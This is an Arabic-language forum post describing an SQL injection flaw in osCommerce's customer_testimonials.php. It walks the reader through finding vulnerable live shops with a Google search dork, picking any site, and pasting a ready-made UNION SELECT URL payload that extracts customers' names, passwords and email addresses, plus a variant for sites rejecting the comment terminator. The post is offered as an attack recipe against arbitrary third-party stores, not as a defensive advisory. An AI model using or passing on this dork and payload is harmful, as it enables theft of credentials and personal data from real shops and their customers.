ثغرة في مواقع Oscommerce والمواقع بالهبل

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته

اليوم جبت لكم ثغرة في مواقع Oscommerce وهذه المواقع معروفة بأنها مواقع شوب ثغرة osCommerce

طيب الثغرة إلّي معانا هي حقن قاعدة البيانات (SQL Injection Vulnerability)

كود PHP:

osCommerce 'customer_testimonials.php' SQL Injection Vulnerability

مصدر الثغرة :

كود PHP:

http://www.securityfocus.com/bid/27664/exploit

شرح الثغرة :

السكربت المصاب

كود PHP:

osCommerce 3.1

نذهب إلى عم جوجل و نكتب :

كود PHP:

inurl:"customer_testimonials.php?testimonial_id="

ستظهر للك العديد من المواقع ... ثغرة osCommerce

إختر موقع ثم أكتب التالي :

كود PHP:

     http://www.site.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*

في مواقع لا تدعم ال /* تستطيع حذفها لتصبح :

كود PHP:

     http://www.site.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers